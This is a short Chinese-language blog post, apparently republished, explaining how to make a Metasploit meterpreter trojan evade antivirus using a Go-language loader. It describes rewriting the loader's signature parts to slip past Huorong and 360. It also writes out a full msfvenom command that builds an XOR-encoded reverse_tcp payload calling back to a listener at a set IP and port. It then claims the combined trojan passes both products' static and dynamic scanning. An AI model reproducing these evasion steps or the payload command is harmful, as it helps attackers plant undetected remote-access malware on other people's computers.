技术分享 | go语言源码免杀MSF木马

木马源码免杀两种形式：下载者和加载者

前言

加载者的免杀分为两部分

1. 加载器本身的免杀，加载器源码因为在网上发布许久。特征码已被查杀。

2. msf本身的shllcode免杀。需要对msf马进行多次混淆编码。

加载器免杀

这里我不放shellcode木马如何免杀，看看网上加载器的特征会被多少AV识别。

在微步的VT 0/25

virustotal的VT 15/71

免杀的过了火绒，但是没过360。

接下来从源码级别看看能不能免杀加载器。

因为这个加载器放在freebuf很久了 360的肯定加入黑名单了。

对下载者做下改动,方便shellcode的填写。

把这个shellcode_buf删掉，火绒无报毒。说明这里是特征码之一。

将这个shellcode部分改写。

火绒无报毒，360无报毒 。

shellcode免杀

利用msfvenom进行多次编码绕过。

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor_dynamic -i 3 lhost=192.168.7.122 lport=6666 -f c

这里我选择的是 x64/xor_dynamic编码 因为是64的马，最好选择x64的编码。

-i 是次数 3

这里单纯的利用编码就可绕过火绒动静态查杀，火绒还是很容易绕过的。

360静态查杀报毒，说明360对msfvenom编码查杀严格一些。

利用go语言生成完整加载者木马免杀

将两者结合

可过360动静态免杀。

过火绒动静态。

天磊卫士 带你走进网络安全扫码获取更多网络安全资讯

（编辑：青岛站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!